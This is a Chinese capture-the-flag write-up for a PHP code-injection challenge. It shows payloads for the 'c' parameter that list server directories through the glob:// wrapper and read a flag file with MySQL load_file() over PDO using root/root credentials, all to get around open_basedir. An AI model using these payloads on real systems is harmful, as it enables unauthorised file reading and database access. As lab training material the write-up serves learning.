信息收集

启用了open_basedir，所以之前的方法又不能用了

解题

c=foreach(new DirectoryIterator("glob:///*") as $a){
    echo($a->__toString().' ');
}
ob_flush();

c=if ( $a = opendir("glob:///*") ) {
    while ( ($file = readdir($a)) !== false ) {
        echo $file."<br>";
    }
    closedir($a);
    exit();
}

又有open_basedir限制了
web72里那一大坨代码也不能用了，估计开启了ASLR GS之类的堆栈保护
答案给了新的方法

c=try {
	$dbh = new PDO('mysql:host=localhost;dbname=ctftraining', 'root','root');
	foreach($dbh->query('select load_file("/flag36.txt")') as $row){
		echo($row[0])."\n<br>"; 
	}
	$dbh = null;
}catch (PDOException $e) {
	echo $e->getMessage();
	exit(0);
}exit(0);

在代码里写注释有时会使代码失效

PDO：（PHP数据对象）是PHP的一个轻量级数据库访问抽象层，允许开发者以一种统一的方式访问多种不同类型的数据库，如MySQL、PostgreSQL、SQLite等。

PDO::query： 执行 SQL 语句，返回PDOStatement对象

select load_file：使用了mysql的load_file函数

load_file：函数允许从服务器的文件系统中读取文件，并将其内容作为字符串返回。然而，这个函数需要满足一定的权限条件，并且文件路径必须是服务器能够访问的

这些都不是关键，关键是数据库名、账号、密码怎么来的，如果不是答案给了，根本不知道

---

web74    目录    web76